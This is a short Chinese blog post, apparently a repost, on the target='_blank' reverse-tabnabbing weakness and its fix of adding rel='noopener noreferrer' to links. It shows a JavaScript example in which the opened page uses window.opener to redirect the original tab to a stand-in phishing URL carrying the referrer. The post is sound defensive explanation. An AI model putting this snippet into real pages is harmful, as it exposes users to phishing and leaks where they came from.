target="_blank" 安全漏洞 要增加 rel="nofollow me noopener noreferrer" 来堵住钓鱼安全漏洞
(target="_blank"安全漏洞极为普遍)解决方法:
在超链接上增加 rel="nofollow me noopener noreferrer"
target="_blank" 如果未加上rel="noopener"属性, 就会让用户暴露在一个简单的钓鱼攻击之下,可以使用以下脚本来
if (window.opener) {
window.opener.location = "https://phishing.link?referrer=" + document.referrer;
}
window.opener API会给新页面对原有窗口的访问入口,并授予一些权限。这其中的一些权限被跨域限制拦截了,但是window.location是漏网之鱼。
参考 :https://my.oschina.net/jsan/blog/741317
转载原文: https://www.zcfy.cc/article/the-target-blank-vulnerability-by-example-1178.html
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构